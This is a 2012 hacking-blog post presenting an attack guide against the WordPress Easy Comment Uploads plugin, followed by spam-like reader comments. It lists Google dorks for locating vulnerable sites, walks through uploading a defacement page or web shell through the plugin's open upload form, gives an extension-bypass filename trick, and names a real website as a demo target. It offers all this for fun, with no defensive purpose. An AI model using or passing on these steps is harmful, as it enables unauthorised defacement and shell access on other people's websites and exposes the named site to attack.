• Contact

    • Saturday 12 May 2012

    Wordpress Exploit : Thousands of websites are vulnerable

    Posted by
    Hack Wordpress blogs, sites, Wordpress Exploit vulnerability, WordPress Easy Comment Upload Venerability SQL Injection, Filehouse.tk
    This venerability is known as WordPress Easy Comment Upload Venerability.
    Many of you should know about it, but i wrote this article because for ones who don't know about it, it could be fun!.

    Google dorks:

    "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
    /wp-content/plugins/easy-comment-uploads/upload-form.php
    Index of /wp-content/plugins/easy-comment-uploads

    Open Google and enter any dork which Given,
    Now select any website
    and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
    You'll Got Upload Option here :)
    Now Upload Your Deface ....
    and check it here site.com/wp-content/uploads/2011/05/yourfilehere

    Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

    DEMO:
    http://www.findthepearl.com/
    http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
    Thank you for reading stay in touch with filehouse for all latest updates..:)
    Labels:

    3 comments:

    1. Monster12 May 2012 at 11:29

      I will recommend my friends to read this.I will bookmark your blog and have my children check up here often.I am quite sure they will learn lots of new stuff here than anybody else!

      ReplyDelete
    2. windowsdownloadtricks12 May 2012 at 12:52

      wonderful information, I had come to know about your blog from my friend satya , hyderabad,i have read posts of yours, and let me tell you, your website gives the best and the most interesting information. This is just the kind of information that i had been looking for, i'm already your rss reader now and i would regularly watch out for the new posts, once again hats off to you! Thanks a ton once again, Regards, www.windowsdownloadtricks

      ReplyDelete
    3. Shahbaz Khan12 May 2012 at 18:01

      @Monster
      Thanks

      ReplyDelete

    Give your feedback below
    Feel free to comment or request for any software.We will bring it for you.

    Subscribe to: Post Comments (Atom)
    Get buttons